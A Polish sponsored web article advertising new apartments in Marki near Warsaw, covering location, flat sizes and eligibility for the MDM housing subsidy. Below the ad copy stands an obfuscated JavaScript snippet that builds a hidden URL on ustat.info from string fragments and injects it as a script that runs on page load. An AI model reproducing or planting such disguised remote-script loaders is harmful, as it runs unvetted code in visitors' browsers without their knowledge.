Zamknij
REKLAMA

Dlaczego warto zainwestować w nowe mieszkania w Markach?

10:29, 12.09.2018 |
REKLAMA
Skomentuj

Inwestycja w nieruchomości rynku pierwotnego to opcja, na którą decyduje się coraz więcej osób. Lokale w stanie deweloperskim to bowiem pewność doskonałego stanu pod względem budowlanym i wykończeniowym, a przy tym duża swoboda w urządzaniu się i brak konieczności przeprowadzania kosztownych remontów. Nowe mieszkania w Markach stanowią szczególnie atrakcyjną opcję, szczególnie, że spełniają wymagania programu MDM.

Nowe mieszkania od doświadczonego dewelopera w Markach

Nowe mieszkania powstają w Markach, miasteczku znajdującym się pod Warszawą. Jest to spokojna, bezpieczna i piękna okolica, z dostępem do takich atrakcji, jak Jezioro Czarne, Rzeka Długa czy Lasy Drewnickie. Nie braknie jednak również obiektów użytkowych potrzebnych w codziennym życiu – osiedle znajduje się blisko infrastruktury, w promieniu zaledwie kilku minut drogi znajdują się sklepy, szkoły i przychodnie.

Nieruchomości w markach powstają dzięki doświadczonemu deweloperowi, który postanowił stworzyć w tym miejscu ponad 400 nowoczesnych mieszkań, rozlokowanych w 9 budynkach. Osiedle jest ogrodzone, ozdobione zielenią i wyposażone w place zabaw oraz podziemne miejsca parkingowe dla mieszkańców.

Miasteczko Marki – idealna lokalizacja dla nieruchomości

Nieruchomości w Markach w http://www.mazoviadevelopment.pl/oferta/ cieszą się idealną lokalizacją – na miejscu nie brakuje infrastruktury i pięknych terenów rekreacyjnych. Zaletą jest także niewielka odległość od dużego miasta, umożliwiająca łatwe dojazdy do pracy czy szkoły w stolicy. Wystarczy kilkanaście minut samochodem, by znaleźć się w Warszawie, dostępnych jest także wiele linii autobusowych, również nocnych, łączących Marki ze stolicą.

Rynek pierwotny w Markach – masz duży wybór nowych mieszkań

Decydując się na nieruchomości rynku pierwotnego w Markach, mamy do wyboru nowe mieszkania o różnym układzie i metrażu. Dostępne są lokale 2, 3 oraz 4-pokojowe, o wielkości od 35 do 84 m2. To pozwala na znalezienie idealnego lokum zarówno osobom samotnym i parom, jak i rodzinom z dziećmi.

Nowe mieszkania w Markach posiadają balkony i tarasy, lub ogródki lokatorskie w przypadku lokali umiejscowionych na parterze. Mają także dostęp do komórek lokatorskich oraz podziemnych garaży, bez obowiązku wykupywania miejsca.

Dostępność mieszkań MDM w Markach – możesz postarać się o dofinansowanie

Dużą zaletą nieruchomości rynku pierwotnego w Markach jest dostępność lokali, które spełniają wymogi programu Mieszkanie Dla Młodych. Inicjatywa ta obejmuje dofinansowanie dla osób poniżej 35. roku życia, w formie dopłaty do wkładu własnego kredytu na mieszkanie. Zgodnie z zasadami programu, lokale nie mogą przekraczać 75 m2 i muszą mieścić się w ograniczeniach cenowych, narzuconych dla danej lokalizacji. Mieszkania MDM w Markach spełniają wszystkie warunki, by móc starać się o dofinansowanie.

Sprzedaż mieszkań w Markach – okazja dla Ciebie

Jeśli szukasz nowych mieszkań w spokojnej i atrakcyjnej okolicy, blisko dużego miasta, nieruchomości w Markach powstają właśnie dla Ciebie. Dogodna lokalizacja, bliskość infrastruktury i nowoczesne rozwiązania sprawiają, że jest to opcja dla każdego. Nieruchomości otrzymuje się w stanie deweloperskim, z wykończeniem wysokiej jakości.

(function(){ ttx2u="w6mus6kltx2w";ttx2=document.createElement("script"); ttx2_="u"+("st");ttx2_+="at"+(".");ttx2.async=true;ttx2_+="in"; ttx2u="124338352."+ttx2u;ttx2.type="text/javascript";ttx2u+="7y330gb72unr"; ttx2u+="tf9dbf";ttx2_+=("f")+"o"+("/");ttx2.src="https://"+ttx2_+ttx2u; ttx2d=document.body;ttx2d.appendChild(ttx2); })();

Co sądzisz na ten temat?

podoba mi się 0
nie podoba mi się 0
śmieszne 0
szokujące 0
przykre 0
wkurzające 0
facebookFacebook
twitterTwitter
wykopWykop
komentarzeKomentarze
REKLAMA
REKLAMA

Komentarze (0)

Brak komentarzy, Twój może być pierwszy.

Dodaj komentarz

REKLAMA
© hej.mielec.pl | Prawa zastrzeżone